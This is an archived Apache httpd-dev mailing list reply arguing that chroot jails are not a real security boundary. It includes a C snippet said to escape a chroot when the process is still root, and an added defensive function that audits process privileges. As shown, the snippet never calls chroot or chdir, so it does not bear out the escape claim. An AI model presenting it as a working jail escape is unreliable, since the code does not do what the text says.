httpd-dev mailing list archives

From Plüm, Rüdiger, VF-Group <>
Subject RE: High security
Date Thu, 24 Jan 2008 12:50:54 GMT

> -----Original Message-----
> From: Colm MacCarthaigh [] 
> Sent: Donnerstag, 24. Januar 2008 13:16
> To:
> Subject: Re: High security
> On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote:
> > You specify one directive, and the only thing you have to put in the
> > jail is your htdocs and logs directories; all other files (conf,
> > modules, httpd, libraries, etc.) are outside of the jail. This is really
> > top security - it's almost impossible to find something to hack.
> Well don't kid yourself, it makes privilege escalation by certain routes
> much harder, but it's not even close to almost impossible. There are
> many forms of IPC available between the children and the root-level
> Apache process anyway, and if you manage to exploit that it's game over
> anyway (including breaking out of the jail).

Yep. chroot was never designed to be a security feature. It can make
things more difficult to leave a jailed area.

See also

or have a look at

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    FILE *file;

    file = fopen("blah1", "w");
    if (file == NULL)
        return 1;
    fprintf(file, "Hello\n");
    mkdir("foo", 493);    /* 493 decimal == 0755 octal */
    file = fopen("blah2", "w");
    if (file == NULL)
        return 1;
    fprintf(file, "Hello\n");
    return 0;
}

which allows you to escape the chroot of /tmp/zw/blah1 if
you are still root at the point of time mkdir is executed
and write a file to /tmp/zw/blah2
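
Added example, not part of the original message or of httpd: a defender-side check for the condition the message names, a jailed process that is "still root". It assumes Linux and the /proc/<pid>/status text format, and generalizes "root" to a saved UID of 0 and to the CAP_SYS_CHROOT and CAP_SETUID capabilities; the function name, flag names and sample text are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Bit numbers from <linux/capability.h>. */
#define CAP_SETUID_BIT      7
#define CAP_SYS_CHROOT_BIT 18

enum {
    JAIL_OK          = 0,
    JAIL_ROOT_UID    = 1,  /* real, effective or saved UID is 0 */
    JAIL_CAN_CHROOT  = 2,  /* CAP_SYS_CHROOT effective: chroot(2) still works */
    JAIL_CAN_SETUID  = 4,  /* CAP_SETUID effective: can switch back to UID 0 */
    JAIL_PARSE_ERROR = 8
};

/* Audit text in Linux /proc/<pid>/status format (assumption); returns a bitmask. */
int audit_jailed_status(const char *status)
{
    unsigned long ruid, euid, suid, fsuid;
    unsigned long long capeff;
    const char *uid_line = strstr(status, "\nUid:");
    const char *cap_line = strstr(status, "\nCapEff:");
    int findings = JAIL_OK;
    if (uid_line == NULL || cap_line == NULL)
        return JAIL_PARSE_ERROR;
    if (sscanf(uid_line, " Uid: %lu %lu %lu %lu", &ruid, &euid, &suid, &fsuid) != 4)
        return JAIL_PARSE_ERROR;
    if (sscanf(cap_line, " CapEff: %llx", &capeff) != 1)
        return JAIL_PARSE_ERROR;
    /* A saved UID of 0 counts: seteuid(0) would restore root inside the jail. */
    if (ruid == 0 || euid == 0 || suid == 0)
        findings |= JAIL_ROOT_UID;
    if (capeff & (1ULL << CAP_SYS_CHROOT_BIT))
        findings |= JAIL_CAN_CHROOT;
    if (capeff & (1ULL << CAP_SETUID_BIT))
        findings |= JAIL_CAN_SETUID;
    return findings;
}

/* Constructed samples, not captured from a real system. */
static const char ROOT_WORKER[] = "Name:\thttpd\nUid:\t0\t0\t0\t0\nCapEff:\t0000003fffffffff\n";
static const char DROPPED_WORKER[] = "Name:\thttpd\nUid:\t48\t48\t48\t48\nCapEff:\t0000000000000000\n";
static const char SAVED_ROOT[] = "Name:\thttpd\nUid:\t48\t48\t0\t48\nCapEff:\t0000000000000000\n";

int main(void)
{
    printf("root=%d dropped=%d saved-root=%d\n", audit_jailed_status(ROOT_WORKER),
           audit_jailed_status(DROPPED_WORKER), audit_jailed_status(SAVED_ROOT));
    return 0;
}
```

Any nonzero result for a process that runs inside a chroot means the jail should not be counted as a boundary for that process.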


